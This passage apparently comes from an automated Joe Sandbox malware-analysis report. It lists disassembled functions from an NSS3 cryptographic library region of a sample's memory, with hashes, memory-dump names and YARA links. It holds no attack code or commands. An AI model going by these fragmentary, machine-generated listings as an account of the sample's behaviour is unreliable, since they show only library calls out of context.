                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                                                          • String ID: dtls13
                                                                                                                                                                                                                                                                                          • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                                                          • Opcode ID: d3cb218deceedfc1788144f2b0f9d725f1bd998faa205479830f96fa1640e2d0
                                                                                                                                                                                                                                                                                          • Instruction ID: 90c691820509d055513ea965319844a6f3254bc6635c62dc44e85bc0e8d4c311
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3cb218deceedfc1788144f2b0f9d725f1bd998faa205479830f96fa1640e2d0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43311671A002199FCB20DF28DE84B9AB7E4EF4534CF158439E8189BB51E731E915CBE1
                                                                                                                                                                                                                                                                                          Function 6C6FAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6FAFBE
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C819500,6C6F3F91), ref: 6C6FAFD2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C6FB007
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C746A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C6F1666,?,6C6FB00C,?), ref: 6C746AFB
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C6FB02F
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6FB046
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6FB058
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6FB060
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: d7b3ef0f3bcd6e29cd9a8f9765bb38099ba0664790479d0d22c0200a656e247d
                                                                                                                                                                                                                                                                                          • Instruction ID: 808afc4db8afbc5ca3fd02d6e4d3132fc4de4aae97bf9fffdb781433945c18cd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7b3ef0f3bcd6e29cd9a8f9765bb38099ba0664790479d0d22c0200a656e247d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF316B704043009BDB208F24DC49BAA77A4AFC236CF544B28F8745BBD1E732920AC79B
                                                                                                                                                                                                                                                                                          Function 6C6F3E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6F3F7F,?,00000055,?,?,6C6F1666,?,?), ref: 6C6F40D9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C6F1666,?,?), ref: 6C6F40FC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C6F1666,?,?), ref: 6C6F4138
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F3EC2
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6F3ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F3EEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F3F02
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6F3F14
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6F3F1C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7564F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C75127C,00000000,00000000,00000000), ref: 6C75650E
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F3F27
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 1076417423-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 02097b7142ceb933fb0e62365217893dfbee8c5dfc401cb03c183897ef54f8c3
                                                                                                                                                                                                                                                                                          • Instruction ID: bc0d29b0ca04a7a568292d386c6724a5e326f4e3fd0795d19cdf86ddd669d776
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02097b7142ceb933fb0e62365217893dfbee8c5dfc401cb03c183897ef54f8c3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 612128B2904300ABD7109F24AD49FAA77A8BB4531CF40093DF959A7741EB31D618C79A
                                                                                                                                                                                                                                                                                          Function 6C73CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C73CD08
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C73CE16
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C73D079
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9c41c8dc00b1f02a8598b0a7bd4337dd1917848d9c447572e254113b68ddff68
                                                                                                                                                                                                                                                                                          • Instruction ID: b1f7d61f87fb1e7ecb398fc062ab7352b2ac502a72a98becaf6bb3669e74e9ea
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c41c8dc00b1f02a8598b0a7bd4337dd1917848d9c447572e254113b68ddff68
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42C1A1B1A002299BDB10DF24CD84BDAB7B4BF48318F1451A8E94C97742E775EE95CF90
                                                                                                                                                                                                                                                                                          Function 6C72DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C7397C1,?,00000000,00000000,?,?,?,00000000,?,6C717F4A,00000000), ref: 6C72DC68
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DD36
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DE2D
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DE43
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DE76
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DF32
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DF5F
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DF78
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C717F4A,00000000,?,00000000,00000000), ref: 6C72DFAA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c337e43147a018824d662f4b2dbd1d9211d227dd4ec9f04815474009f4e8e13
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC81C171E066008BFB144A19CA9836A729ADF70748F30843ED919CAFE5EB7CC484C64E
                                                                                                                                                                                                                                                                                          Function 6C703C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C703C76
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C703C94
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: TlsGetValue.KERNEL32(00000000,?,6C7100D2,00000000), ref: 6C6F95D2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: EnterCriticalSection.KERNEL32(?,?,?,6C7100D2,00000000), ref: 6C6F95E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: PR_Unlock.NSS3(?,?,?,?,6C7100D2,00000000), ref: 6C6F9605
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C703CB2
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C703CCA
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C703CE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C71AE42), ref: 6C7030AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7030C7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7030E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C703116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C70312B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PK11_DestroyObject.NSS3(?,?), ref: 6C703154
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C70317E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3167935723-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 186b6b067d68c4fa9d68b15df6de754198d2bf09c1d93544286af36696ddb951
                                                                                                                                                                                                                                                                                          • Instruction ID: 098ae0203ac1cb48ff826660d82a0bd7343a9ce970793843432d02e447d33ac2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 186b6b067d68c4fa9d68b15df6de754198d2bf09c1d93544286af36696ddb951
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B61E4B5B00200ABEB109E65DE49FA777F9EF04748F484178FE099AA52F721D814C7A1
                                                                                                                                                                                                                                                                                          Function 6C743D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PK11_GetAllTokens.NSS3 ref: 6C743481
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_SetError.NSS3(00000000,00000000), ref: 6C7434A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: TlsGetValue.KERNEL32 ref: 6C74352E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: EnterCriticalSection.KERNEL32(?), ref: 6C743542
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_Unlock.NSS3(?), ref: 6C74355B
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C743D8B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C743D9F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C743DCA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C743DE2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C743E4F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C743E97
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C743EAB
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C743ED6
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C743EEE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2554137219-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 97509dd9a7c79485a3212cace373de28cb3c61cbf2a038ede44eb3526f3e13e9
                                                                                                                                                                                                                                                                                          • Instruction ID: f80b5f25c44270c9a3835de8259e4553d9331466eaa361bfede79fc0ecf6b59b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97509dd9a7c79485a3212cace373de28cb3c61cbf2a038ede44eb3526f3e13e9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38514571A012109FEB11AF69DE48A6A73B8AF4531CF558179DE0D47B22EB31E844CBC1
                                                                                                                                                                                                                                                                                          Function 6C6F2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0318EBCC), ref: 6C6F2C5D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750D30: calloc.MOZGLUE ref: 6C750D50
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750D30: TlsGetValue.KERNEL32 ref: 6C750D6D
                                                                                                                                                                                                                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C6F2C8D
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F2CE0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6F2CDA,?,00000000), ref: 6C6F2E1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C6F2E33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: TlsGetValue.KERNEL32 ref: 6C6F2E4E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: EnterCriticalSection.KERNEL32(?), ref: 6C6F2E5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableLookup.NSS3(?), ref: 6C6F2E71
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableRemove.NSS3(?), ref: 6C6F2E84
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C6F2E96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F2E00: PR_Unlock.NSS3 ref: 6C6F2EA9
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F2D23
                                                                                                                                                                                                                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C6F2D30
                                                                                                                                                                                                                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6C6F2D3F
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6F2D73
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C6F2DB8
                                                                                                                                                                                                                                                                                          • free.MOZGLUE ref: 6C6F2DC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F3EC2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6F3ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F3EEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C6F3F02
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: PL_FreeArenaPool.NSS3 ref: 6C6F3F14
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6F3F27
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 18ed0a3541bc56dc7da280e9f3971a38e8f7c1bdb2027768a7b02a01dbd9db9a
                                                                                                                                                                                                                                                                                          • Instruction ID: 0ea56cdbf500836598891694cfd6d6c353559125d5a780553055ce0b430d430f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18ed0a3541bc56dc7da280e9f3971a38e8f7c1bdb2027768a7b02a01dbd9db9a
